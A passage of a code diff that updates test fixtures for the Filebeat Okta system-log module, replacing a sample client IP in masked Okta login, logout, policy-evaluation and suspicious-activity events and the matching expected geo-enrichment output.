-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"requestId":"<random_id_string>","requestUri":"<uri_endpoint>","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United States","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z","url":"<url>"}},"device":null,"displayMessage":"User report suspicious activity","eventType":"user.account.report_suspicious_activity_by_enduser","legacyEventType":"core.user.account.report_suspicious_activity_by_enduser","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":7018,"asOrg":"AT&T Services, Inc.","domain":"att.com","isProxy":false,"isp":"AT&T Corp."},"severity":"WARN","target":[{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"c2adb364-88d1-45a9-a620-2b64e44c5fcf","version":"0"}
+{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102nZHzd6OHSfGG51vsoc22gw","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"authnRequestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestId":"XkccyyMli2Uay2I93ZgRzQAAB0c","requestUri":"/login/signout","threatSuspected":"false","url":"/login/signout?message=login_page_messages.session_has_expired"}},"displayMessage":"User logout from Okta","eventType":"user.session.end","legacyEventType":"core.user_auth.logout_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T22:18:51.843Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkccyyMli2Uay2I93ZgRzQAAB0c","type":"WEB"},"uuid":"faf7398a-4f77-11ea-97fb-5925e98228bd","version":"0"}
+{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"User login to Okta","eventType":"user.session.start","legacyEventType":"core.user_auth.login_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.718Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3aeede38-4f67-11ea-abd3-1f5d113f2546","version":"0"}
+{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3af594f9-4f67-11ea-abd3-1f5d113f2546","version":"0"}
+{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"<random_id_string>","requestUri":"<uri_endpoint>","threatSuspected":"false","url":"<url>","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United Sates","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"36a3b6b3-fcc0-47a0-96bd-95330cfdb658","version":"0"}
+{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"requestId":"<random_id_string>","requestUri":"<uri_endpoint>","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United States","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z","url":"<url>"}},"device":null,"displayMessage":"User report suspicious activity","eventType":"user.account.report_suspicious_activity_by_enduser","legacyEventType":"core.user.account.report_suspicious_activity_by_enduser","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":7018,"asOrg":"AT&T Services, Inc.","domain":"att.com","isProxy":false,"isp":"AT&T Corp."},"severity":"WARN","target":[{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"c2adb364-88d1-45a9-a620-2b64e44c5fcf","version":"0"}
diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json
index e882c2b68cf5..794ed2c83cb1 100644
--- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json
+++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json
@@ -6,7 +6,7 @@
         "client.geo.location.lat": 37.7201,
         "client.geo.location.lon": -121.919,
         "client.geo.region_name": "California",
-        "client.ip": "108.255.197.247",
+        "client.ip": "67.43.156.12",
         "client.user.full_name": "xxxxxx",
         "client.user.id": "00u1abvz4pYqdM8ms4x6",
         "event.action": "user.session.end",
@@ -18,7 +18,7 @@
         "event.id": "faf7398a-4f77-11ea-97fb-5925e98228bd",
         "event.kind": "event",
         "event.module": "okta",
-        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}",
+        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}",
         "event.outcome": "success",
         "event.type": [
             "end",
@@ -34,7 +34,7 @@
         "okta.authentication_context.authentication_step": 0,
         "okta.authentication_context.external_session_id": "102nZHzd6OHSfGG51vsoc22gw",
         "okta.client.device": "Computer",
-        "okta.client.ip": "108.255.197.247",
+        "okta.client.ip": "67.43.156.12",
         "okta.client.user_agent.browser": "FIREFOX",
         "okta.client.user_agent.os": "Mac OS X",
         "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -50,23 +50,19 @@
         "okta.transaction.type": "WEB",
         "okta.uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd",
         "related.ip": [
-            "108.255.197.247"
+            "67.43.156.12"
         ],
         "related.user": [
             "xxxxxx"
         ],
         "service.type": "okta",
-        "source.as.number": 7018,
-        "source.as.organization.name": "AT&T Services, Inc.",
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.7201,
-        "source.geo.location.lon": -121.919,
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "108.255.197.247",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.user.full_name": "xxxxxx",
         "source.user.id": "00u1abvz4pYqdM8ms4x6",
         "tags": [
@@ -91,7 +87,7 @@
         "client.geo.location.lat": 37.7201,
         "client.geo.location.lon": -121.919,
         "client.geo.region_name": "California",
-        "client.ip": "108.255.197.247",
+        "client.ip": "67.43.156.12",
         "client.user.full_name": "xxxxxx",
         "client.user.id": "00u1abvz4pYqdM8ms4x6",
         "event.action": "user.session.start",
@@ -103,7 +99,7 @@
         "event.id": "3aeede38-4f67-11ea-abd3-1f5d113f2546",
         "event.kind": "event",
         "event.module": "okta",
-        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}",
+        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}",
         "event.outcome": "success",
         "event.type": [
             "start",
@@ -111,7 +107,7 @@
         ],
         "fileset.name": "system",
         "input.type": "log",
-        "log.offset": 1665,
+        "log.offset": 1659,
         "okta.actor.alternate_id": "xxxxxx@elastic.co",
         "okta.actor.display_name": "xxxxxx",
         "okta.actor.id": "00u1abvz4pYqdM8ms4x6",
@@ -119,7 +115,7 @@
         "okta.authentication_context.authentication_step": 0,
         "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ",
         "okta.client.device": "Computer",
-        "okta.client.ip": "108.255.197.247",
+        "okta.client.ip": "67.43.156.12",
         "okta.client.user_agent.browser": "FIREFOX",
         "okta.client.user_agent.os": "Mac OS X",
         "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -136,23 +132,19 @@
         "okta.transaction.type": "WEB",
         "okta.uuid": "3aeede38-4f67-11ea-abd3-1f5d113f2546",
         "related.ip": [
-            "108.255.197.247"
+            "67.43.156.12"
         ],
         "related.user": [
             "xxxxxx"
         ],
         "service.type": "okta",
-        "source.as.number": 7018,
-        "source.as.organization.name": "AT&T Services, Inc.",
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.7201,
-        "source.geo.location.lon": -121.919,
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "108.255.197.247",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.user.full_name": "xxxxxx",
         "source.user.id": "00u1abvz4pYqdM8ms4x6",
         "tags": [
@@ -176,7 +168,7 @@
         "client.geo.location.lat": 37.7201,
         "client.geo.location.lon": -121.919,
         "client.geo.region_name": "California",
-        "client.ip": "108.255.197.247",
+        "client.ip": "67.43.156.12",
         "client.user.full_name": "xxxxxx",
         "client.user.id": "00u1abvz4pYqdM8ms4x6",
         "event.action": "policy.evaluate_sign_on",
@@ -187,14 +179,14 @@
         "event.id": "3af594f9-4f67-11ea-abd3-1f5d113f2546",
         "event.kind": "event",
         "event.module": "okta",
-        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}",
+        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 